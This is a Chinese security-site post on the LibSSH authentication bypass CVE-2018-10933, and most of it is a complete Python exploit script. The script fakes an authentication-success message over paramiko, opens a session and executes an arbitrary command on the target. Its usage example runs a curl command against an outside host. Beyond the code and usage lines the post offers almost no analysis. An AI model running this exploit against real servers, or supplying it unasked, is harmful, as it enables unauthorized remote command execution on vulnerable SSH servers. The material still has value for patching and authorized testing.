LibSSH 登录绕过漏洞利用分析 (CVE-2018-10933)

  • A+
所属分类:网络安全文章

LibSSH 登录绕过漏洞利用分析 (CVE-2018-10933)

漏洞利用

脚本使用方法:

  1. python vulnspy_libssh.py target.com 2222 'curl www.cesafe.com'

测试脚本:

  1. #!/usr/bin/env python
  2. import paramiko
  3. import socket
  4. import argparse
  5. import logging
  6. import sys
  7. import time
  8. import datetime
  9. def BypasslibSSHwithoutcredentials(hostname, port, cmd):
  10.     sock = socket.socket()
  11.     try:
  12.         #logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
  13.         sock.connect((str(hostname), int(port)))
  14.         message = paramiko.message.Message()
  15.         transport = paramiko.transport.Transport(sock)
  16.         transport.start_client()
  17.         message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
  18.         transport._send_message(message)
  19.         # ref:http://joelinoff.com/blog/?p=905
  20.         session = transport.open_session()
  21.         session.exec_command(cmd)
  22.         data = ''
  23.         maxseconds = 5
  24.         start = datetime.datetime.now()
  25.         start_secs = time.mktime(start.timetuple())
  26.         while True:
  27.                 if session.recv_ready():
  28.                     data = data+session.recv(2048)
  29.                 if session.exit_status_ready():
  30.                     break
  31.                 now = datetime.datetime.now()
  32.                 now_secs = time.mktime(now.timetuple())
  33.                 et_secs = now_secs - start_secs
  34.                 if et_secs > maxseconds:
  35.                     data = data+'\ntimeout'
  36.                     break
  37.         print data
  38.         return 0
  39.     except paramiko.SSHException as e:
  40.         print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
  41.         return 1
  42.     except socket.error:
  43.         print("Unable to connect.")
  44.         return 1
  45. def main():
  46.     try:
  47.         hostname = sys.argv[1]
  48.         port = sys.argv[2]
  49.         cmd = sys.argv[3]
  50.     except:
  51.         print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl www.cesafe.com'")
  52.         exit(1)
  53.     BypasslibSSHwithoutcredentials(hostname, port, cmd)
  54. if __name__ == '__main__':
  55.     exit(main())
  • 服务器购买微信群
  • 阿里云&腾讯云&国外VPS
  • weinxin
  • 服务器购买QQ群
  • 阿里云&腾讯云&国外VPS
  • weinxin
CE安全网

发表评论

您必须登录才能发表评论!